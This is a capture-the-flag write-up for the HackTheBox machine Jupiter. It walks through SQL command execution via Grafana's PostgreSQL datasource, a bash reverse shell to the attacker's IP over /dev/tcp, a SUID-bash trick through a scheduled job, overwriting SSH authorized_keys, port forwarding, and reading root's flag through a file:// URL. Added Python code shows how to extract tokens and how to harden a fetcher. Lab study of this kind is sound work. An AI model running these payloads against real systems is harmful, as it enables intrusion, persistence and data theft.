HackTheBox : Jupiter
Intro: This is my writeup for the HackTheBox machine Jupiter. It is a moderately difficult free machine. The foothold is command execution through a PostgreSQL datasource in Grafana (COPY ... FROM PROGRAM), and after that you have to do pivoting and lateral movement. So let's dive into the machine.
Nmap Scan :
As usual I start with a simple Nmap scan. Two ports are open, as usual: 22 (ssh) and 80 (http).
Web Enumeration :
The site uses the domain name 'jupiter.htb'. I added it to my hosts file and explored the website.
It is a simple website and I found nothing special on this page. I also tried 'gobuster' and 'nikto' scans, but they turned up nothing useful.
So in this situation I started subdomain enumeration with 'gobuster' and found a subdomain called 'kiosk.jupiter.htb'.
So I added this to my hosts file as well and visited the site.
Web Exploitation :
This is a website with detailed information about the planets of our Solar System, and it is a Grafana dashboard. In the page itself I found nothing interesting, so I intercepted all requests in Burp Suite and found an interesting POST request to '/api/ds/query'.
So I sent the request to Burp's Repeater. The request looks like this.
At the bottom of the request body there is some JSON describing a PostgreSQL datasource ["type" : "postgres"] and the raw SQL that Grafana runs against it. That means whatever SQL we put in this request is executed by the backend database. PostgreSQL's COPY ... FROM PROGRAM (the technique catalogued as CVE-2019-9193) runs a shell command as the database's OS user, provided the datasource's DB user is a superuser or a member of pg_execute_server_program. So I tried the statements from that payload list one by one, each as its own query.
Tip : 1> DROP TABLE IF EXISTS cmd_exec;
2> CREATE TABLE cmd_exec(cmd_output text);
3> COPY cmd_exec FROM PROGRAM 'id';
Note : I replaced the 'id' command with a bash reverse shell, because the response to the COPY query does not return the command output (it only lands in the cmd_exec table), so we never get to see the result of 'id'.
Tip : bash -c "bash -i >& /dev/tcp/<tun0_ip>/<port> 0>&1"
Because the command sits inside a single-quoted SQL literal inside a JSON string, the double quotes have to be escaped as \" in the request body, and any single quote in the command would have to be doubled.
After setting up my listener I got a reverse shell as the 'postgres' user.
Then I upgraded the shell, because the raw shell is not properly usable. Follow the commands below.
Tip : 1> python3 -c 'import pty; pty.spawn("/bin/bash")'
2> Ctrl-Z
3> stty raw -echo; fg
4> export TERM=xterm (press Enter)
postgres → juno :
Then I went to the home folder, since this user has no user flag. There are two users, 'juno' and 'jovian'. I tried to find all files that belong to the 'juno' user.
Tip : find / -user juno 2>/dev/null
There are a lot of files, but the following one is interesting.
I opened that file in a text editor and changed some of the commands. It is a YAML list of processes (a path plus its args) that is evidently executed as juno on a schedule.
I changed the path and args of the 1st process and of the 2nd process to the following.
Tip :
- path: /usr/bin/cp
  args: /bin/bash /tmp/bash   [1st process]
- path: /usr/bin/chmod
  args: u+s /tmp/bash   [2nd process]
Basically we copy the 'bash' binary and set the SUID bit on the copy. Since the processes run as 'juno', the copy /tmp/bash is owned by juno with SUID set, so running it gives us juno's effective uid.
After some time the SUID binary appears in /tmp.
Let's run that binary as '/tmp/bash -p'. The -p flag matters: without it bash drops the effective uid back to the real uid and the SUID bit is wasted.
And at last we get a shell as juno. But in his home folder we have no permission to read his 'user.txt' file. Permission denied. :)
But there is a '.ssh' directory. I went in and found an authorized_keys file.
So I replaced that file with my own public key, keeping the name authorized_keys. (Appending with '>>' instead of replacing is the gentler option, since it keeps whatever access already exists.) Follow the process below.
Generate a private/public key pair with 'ssh-keygen'.
Send the public key to the victim machine, into juno's '.ssh' directory.
Tip : mv id_rsa.pub authorized_keys
Tip : chmod 600 id_rsa (on your private key, on your own machine)
Then I logged in to juno's account using my own private key.
Here I got the user flag.
Oh! At last. A long process. Yes!!!! :) :)
Pivoting : Juno → jovian
In the user shell I ran 'netstat -nptl' to list all ports listening on the machine.
I found '127.0.0.1:8888' interesting, so I forwarded that port to my local machine using SSH local port forwarding.
Tip : ssh -i id_rsa -L 8888:127.0.0.1:8888 juno@<victim_ip>
This command forwards the remote port 8888 to port 8888 on my machine, so I can access it at http://127.0.0.1:8888. :)
I got the page above: a Jupyter server, which asks for a valid password or token. So let's find it. It is actually on the box, reachable from our user shell, in '/opt/solar-flares/logs'.
There are many log files; which one is the right one? A bash one-liner finds the token in all of them.
Tip : cat * | grep "token"
There are many tokens. I used the last one, because it is the most recent one logged; the earlier ones belong to older runs of the server. Your token will be different.
I pasted that token into the token field and logged in.
Here I opened the second one, 'flares.ipynb'.
Then I went to File → New Notebook → Python 3 (ipykernel).
In that notebook I put a Python3 reverse shell command, set up my netcat listener and clicked 'Run'. Immediately I got a shell as 'jovian', the user the Jupyter server runs as.
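An added example for the token hunt above (my own code, not from the writeup): a small parser that pulls Jupyter tokens out of log lines and returns the newest one. The log lines below are constructed samples in Jupyter's log format, not the machine's real logs. It also reads a whole log directory in modification-time order, which is safer than the writeup's 'cat *', since shell globbing sorts file names alphabetically rather than chronologically.

```python
"""
Added example, not from the original writeup: extract Jupyter server
tokens from log lines and pick the most recent one.
"""
import re
from pathlib import Path

# Jupyter writes its login URL, "...?token=<hex>", to the log on every
# server start; the token from the latest start is the one that works.
TOKEN_RE = re.compile(r"[?&]token=([0-9a-f]{16,})")

# Constructed sample log (not the real /opt/solar-flares/logs content),
# oldest entries first, in the format Jupyter Server uses.
SAMPLE_LOG = """\
[I 2023-05-01 09:00:12.101 ServerApp] Jupyter Server 2.1.0 is running at:
[I 2023-05-01 09:00:12.102 ServerApp] http://localhost:8888/lab?token=0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c4b5a6978
[I 2023-05-01 09:00:12.102 ServerApp]     http://127.0.0.1:8888/lab?token=0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c4b5a6978
[W 2023-05-01 09:41:03.555 ServerApp] 403 GET /api/contents (127.0.0.1): Forbidden
[I 2023-05-02 10:15:44.209 ServerApp] Jupyter Server 2.1.0 is running at:
[I 2023-05-02 10:15:44.210 ServerApp] http://localhost:8888/lab?token=deadbeef00112233445566778899aabbccddeeff01234567
"""


def extract_tokens(lines) -> list:
    """Unique tokens in the order they first appear (the same URL is
    usually logged twice, once per bind address)."""
    seen = {}
    for line in lines:
        m = TOKEN_RE.search(line)
        if m:
            seen.setdefault(m.group(1), None)
    return list(seen)


def latest_token(lines):
    """Most recently logged token, or None if there is none."""
    tokens = extract_tokens(lines)
    return tokens[-1] if tokens else None


def latest_token_from_dir(log_dir) -> str:
    """Concatenate every file in log_dir ordered by mtime, then take the
    newest token. Path is an assumption; point it at the real log folder."""
    files = sorted(Path(log_dir).glob("*"), key=lambda p: p.stat().st_mtime)
    lines = []
    for f in files:
        if f.is_file():
            lines.extend(f.read_text(errors="replace").splitlines())
    return latest_token(lines)


if __name__ == "__main__":
    print("sample log, newest token:", latest_token(SAMPLE_LOG.splitlines()))
    # On the box: print(latest_token_from_dir("/opt/solar-flares/logs"))
```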
Privilege Escalation :
So it's time for some privesc. I ran 'sudo -l' and it showed me the following.
So jovian is allowed to run a binary as root.
I ran 'strings' on that binary and found that it reads a JSON config file, '/tmp/config.json'.
So I copied that config file into /tmp for testing.
The file content is shown below.
It has a 'tlesources' list of URLs whose content the binary downloads. So what if we change one of those entries to '/root/root.txt'? Since the binary runs as root, it would fetch the root flag for us without a root shell. Let's try.
Tip : file:///root/root.txt
Then I ran the binary with 'sudo'.
It did something. I ran 'ls' in /tmp and found that a new folder, 'tle', had been created. Amazing!!! :)
I went into that folder and found the 'root.txt' file with the proper flag content. Yessss!!!!!!! :)
So our plan fully succeeded. This is how I pwned the machine. (jupyter → jupiter, maybe :))
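As an added illustration of why the file:// trick works (my own Python stand-in, not the binary on the machine, whose language the writeup does not state): a URL fetcher built on urllib.request happily serves file:// URLs, so a root-run downloader reads any local file named in its config. The hardened version rejects everything but http(s) with a host. The 'tlesources' key and the root.txt file name come from the writeup; the fetch functions, the temp directory and the sample config are assumptions, and the "flag" is a constructed sample written to a temp file.

```python
"""
Added example, not the machine's binary: a naive URL fetcher that accepts
file:// URLs next to a hardened one that only allows http(s) sources.
"""
import json
import os
import tempfile
import urllib.parse
import urllib.request


def fetch_unchecked(url: str) -> bytes:
    """Naive fetch: urllib's FileHandler serves file:// URLs, so when this
    runs as root it returns the bytes of any local file."""
    with urllib.request.urlopen(url) as resp:
        return resp.read()


def is_allowed_source(url: str) -> bool:
    """Hardened check: scheme must be http or https and a host must be
    present, which rules out file://, data:, ftp:// and bare paths."""
    parts = urllib.parse.urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def fetch_checked(url: str) -> bytes:
    """Same fetch, but refuses anything that is not a remote http(s) URL."""
    if not is_allowed_source(url):
        raise ValueError(f"refusing non-http(s) source: {url}")
    return fetch_unchecked(url)


def sources_from_config(config_text: str) -> list:
    """The 'tlesources' list from a config.json-style document (assumption:
    the real config has the same shape)."""
    return json.loads(config_text)["tlesources"]


def demo() -> dict:
    """Stand-in for /root/root.txt: a constructed file in a temp dir, named
    in a config via file://, fetched the naive way and the checked way."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "root.txt")
        with open(secret, "w") as f:
            f.write("flag{constructed-sample}\n")       # constructed, not a real flag
        url = "file://" + urllib.request.pathname2url(secret)
        config = json.dumps({"tlesources": [url]})
        results = {}
        for src in sources_from_config(config):
            results["unchecked"] = fetch_unchecked(src).decode()
            try:
                fetch_checked(src)
                results["checked"] = "fetched"
            except ValueError as exc:
                results["checked"] = str(exc)
        return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value.strip()}")
```

The point of the check is the scheme and host allowlist, not a denylist of file://: a root-privileged downloader should never be able to name a local path as a "source" at all.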
THANKS FOR READING!
Happy Hacking~